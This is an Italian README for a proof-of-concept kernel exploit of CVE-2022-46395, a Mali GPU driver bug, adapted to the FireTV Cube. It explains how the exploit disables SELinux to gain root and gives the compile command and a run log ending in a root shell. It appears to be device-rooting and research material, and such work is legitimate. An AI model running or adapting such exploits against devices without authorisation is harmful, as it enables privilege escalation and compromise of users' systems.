
CVE-2022-46395 POC per FireTV Cube di 3ª generazione (gazelle)
Questo è un fork del POC per Pixel 6 del ricercatore di sicurezza Man Yue Mo per CVE-2022-46395. Leggi il suo articolo dettagliato sulla vulnerabilità qui. Sono state apportate modifiche per tenere conto dello spazio utente a 32 bit di FireOS. Il POC sfrutta un bug nel driver del kernel Mali ARM per ottenere l'esecuzione arbitraria di codice nel kernel, che viene poi utilizzata per disabilitare SELinux e ottenere i permessi di root.
L'exploit è stato corretto in PS7664/3772 (settembre 2023). Come riferimento, il seguente comando è stato utilizzato per compilare con clang in ndk-21:
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o gazelle_buf
Per risultati più rapidi, esegui dopo un riavvio recente. In media il POC impiega 20-60 secondi per ottenere i permessi di root.
gazelle:/ $ /data/local/tmp/gazelle_buf
fingerprint: Amazon/gazelle/gazelle:9/PS7652.3564N/0028488625152:user/amz-p,release-keys
benchmark_time 102
failed after 100
finished reset: 919423975 fault: 918468559 3795 err 0 read 3
found pgd at page 8
overwrite addr : 104100558 558
overwrite addr : 104300558 558
overwrite addr : 10410082c 82c
overwrite addr : 10430082c 82c
result 50
success after 128
gazelle:/ #